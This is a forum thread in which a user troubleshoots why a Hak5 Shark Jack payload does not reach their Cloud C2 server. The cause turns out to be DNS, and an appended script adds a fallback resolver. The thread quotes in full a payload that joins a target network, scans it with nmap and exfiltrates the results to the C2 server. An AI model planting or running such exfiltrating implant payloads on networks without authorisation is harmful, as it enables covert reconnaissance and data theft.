
Sharkjack executes payloads but does not connect to C2


Peque

Hi Forum 

I've bought an essentialKit, and have most of it running as expected.

I've downloaded the payload from Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2
 

The Sharkjack is updated to the latest firmware, version 1.1.0, and I can see the Sharkjack does everything that I want: the loot is created, etc.
I can see that during execution of the payload the Sharkjack gets an IP on the target network, but nothing gets through to my C2 Cloud.

As far as I can see it shouldn't be an issue with my C2 Cloud, since I have a WiFi Pineapple, LAN Turtle and Squirrel running and connecting to C2 Cloud.

How can I check this further, since as far as I can see I cannot SSH to the Sharkjack while the payloads are running? And I have tried reconfiguring my C2 Cloud settings on the jack several times without any luck.

The executed payload:


#!/bin/bash
#
# Title:         Nmap Payload for Shark Jack w/ C2
# Author:        Hak5 (modifications from REDD)
# Version:       1.1
#
# All credit goes to Hak5 Team. I just threw in a simple check for if
# C2 is provisioned in the SharkJack. - If so, exfiltrate!
#
# Scans target subnet with Nmap using specified options. Saves each scan result
# to loot storage folder. Exfiltrates all scans to C2 if provisioned.
#
# LED SETUP ... Obtaining IP address from DHCP
# LED ATTACK ... Scanning
# LED FINISH ... Scan Complete
#
# See nmap --help for options. Default "-sP" ping scans the address space for
# fast host discovery.

C2PROVISION="/etc/device.config"
NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
LOOT_DIR=/root/loot/nmap

# Setup loot directory, DHCP client, and determine subnet
LED SETUP
mkdir -p "$LOOT_DIR"
# Number this run after the scans already stored. On an empty loot directory
# the glob matches nothing and ls complains, so silence it; wc then counts
# zero lines and COUNT becomes 1.
COUNT=$(($(ls "$LOOT_DIR"/*.txt 2>/dev/null | wc -l)+1))
NETMODE DHCP_CLIENT
# Poll until eth0 has an IPv4 address (addr/prefix), then replace the last
# octet with 0 so nmap gets the network address with the DHCP prefix length
while [ -z "$SUBNET" ]; do
  sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
done

# Scan network
LED ATTACK
nmap $NMAP_OPTIONS "$SUBNET" -oN "$LOOT_DIR/nmap-scan_$COUNT.txt"

# Exfiltrate Loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
  LED SPECIAL
  # Connect to Cloud C2
  C2CONNECT
  # Wait until Cloud C2 connection is established. Note this only checks that
  # the cc-client process is running, not that it reached the server: a client
  # that cannot resolve or reach C2 still passes this loop.
  while ! pgrep cc-client; do sleep 1; done
  # Exfiltrate all test loot files
  FILES="$LOOT_DIR/*.txt"
  for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
else
  # Exit script if not provisioned for C2
  LED R SOLID
  exit 1
fi

LED FINISH
sleep 2 && halt

Can I just disable the last 2 lines, so I can SSH into the jack to see if and what the error is while trying to connect to my C2 Cloud?
Since everything else is working as intended, I do not get why I can't get this Sharkjack to deliver to my C2 Cloud.

Any ideas of what is wrong?
/P


Not sure if I missed reading some info, but have you gotten the Shark to connect to C2 at all? Not specifically delivering loot, but that you can see it as a connected device in the C2 interface. You could try a payload that just connects as a DHCP client (with sshd started) to a network and ssh into it and try to connect to C2 and extract loot manually looking for errors. Does the cc-client error log in /tmp tell anything? How are you running your C2 server? Using https?


I have placed the device.config in /etc/.

Yes - My C2 is running https. 
I have also tried the default payload, which should just test C2EXFIL, but I'm still not getting anything on my C2 Cloud.

The only thing in cc-client-error is these 3 lines repeating:

[1646558183 !ERR     INITSYNC ]  Error in startup sync post
[1646558183 !ERR         MAIN ]  Device startup sync failed. Retrying... 
[1646558188 !ERR         CURL ]  Error posting update to server...

But other devices on the same network are working without problems.

Well, found the problem: internal DNS.
Since this is just a test setup at the moment, a separate network at home.
/etc/resolv.conf --> only nameserver 127.0.0.1
Adding my local DNS server (pfSense firewall), and now I'm able to connect to the C2 Cloud.
 

Extra: Is it possible to make it add this DNS server automatically, as a failover DNS, so that if the default DNS (127.0.0.1) does not resolve, it then adds a specified extra DNS server?

And thanks for the input, that gave me the answer.
 

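One way to do the failover the last post asks for, as an added example that is not from the original thread or from Hak5: before C2CONNECT is called, it checks whether the Cloud C2 hostname resolves and, if not, appends a fallback nameserver to /etc/resolv.conf (keeping a copy of the original), then tests again. It also serves as the debug payload the earlier reply suggests, since it brings the interface up as a DHCP client and does not halt, so you can SSH in afterwards and read the cc-client error log in /tmp. The C2 hostname, the fallback resolver address and the resolv.conf path are placeholders to replace; the LED/NETMODE/C2CONNECT calls are the Shark Jack payload commands already used in the thread and are only run when they exist on the system.

```shell
#!/bin/bash
# Added example, not part of the Hak5 payload above: give the Shark Jack a
# fallback resolver when resolv.conf only points at the on-box 127.0.0.1
# forwarder and the Cloud C2 hostname does not resolve through it.
#
# ASSUMPTIONS (placeholders, adjust for your setup):
C2_HOST="${C2_HOST:-c2.example.internal}"     # your Cloud C2 hostname
FALLBACK_DNS="${FALLBACK_DNS:-192.168.1.1}"   # e.g. the pfSense firewall
RESOLV_CONF="${RESOLV_CONF:-/etc/resolv.conf}"

# Read resolv.conf text on stdin; succeed if it lists at least one
# nameserver that is not loopback (127.x.x.x or ::1).
has_usable_nameserver() {
  awk '$1 == "nameserver" && $2 !~ /^127\./ && $2 != "::1" { found = 1 }
       END { exit !found }'
}

# Read resolv.conf text on stdin and print it with "nameserver $1" appended,
# unless that exact line is already present (so retries stay idempotent).
add_fallback_ns() {
  local fallback="$1" text
  text="$(cat)"
  if printf '%s\n' "$text" | grep -qxF "nameserver $fallback"; then
    printf '%s\n' "$text"
  elif [ -z "$text" ]; then
    printf 'nameserver %s\n' "$fallback"
  else
    printf '%s\nnameserver %s\n' "$text" "$fallback"
  fi
}

# Succeed if the name resolves with the resolver currently configured
# (nslookup comes from BusyBox on the Shark Jack).
resolves() {
  nslookup "$1" >/dev/null 2>&1
}

# Try the current resolver first; on failure keep a copy of the original
# resolv.conf, write it back with the fallback appended, and test again.
ensure_c2_resolvable() {
  if resolves "$C2_HOST"; then
    echo "DNS OK: $C2_HOST resolves with current $RESOLV_CONF"
    return 0
  fi
  echo "DNS FAIL: $C2_HOST does not resolve, adding nameserver $FALLBACK_DNS"
  [ -f "$RESOLV_CONF.orig" ] || cp "$RESOLV_CONF" "$RESOLV_CONF.orig"
  add_fallback_ns "$FALLBACK_DNS" < "$RESOLV_CONF.orig" > "$RESOLV_CONF"
  resolves "$C2_HOST"
}

# Payload body: only runs on the device, where the LED/NETMODE/C2CONNECT
# helpers exist. It never halts, so the box stays reachable for SSH and
# the cc-client error log in /tmp can be read after the attempt.
if command -v C2CONNECT >/dev/null 2>&1; then
  LED SETUP
  NETMODE DHCP_CLIENT
  while ! ip addr show eth0 | grep -q 'inet '; do sleep 1; done
  if ensure_c2_resolvable; then
    LED SPECIAL
    C2CONNECT
  else
    LED R SOLID   # still no DNS: stay up for SSH instead of looping forever
  fi
fi
```

The check is deliberately on name resolution rather than on a reachable cc-client process: in the Nmap payload above, the `pgrep cc-client` loop passed even though the client was stuck on "Error in startup sync post", because the process was running but could not resolve the server. Note that on this kind of OpenWrt-based device the 127.0.0.1 entry is the local dnsmasq forwarder, so a cleaner permanent fix is to give that forwarder a working upstream; the snippet only automates what the poster did by hand.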
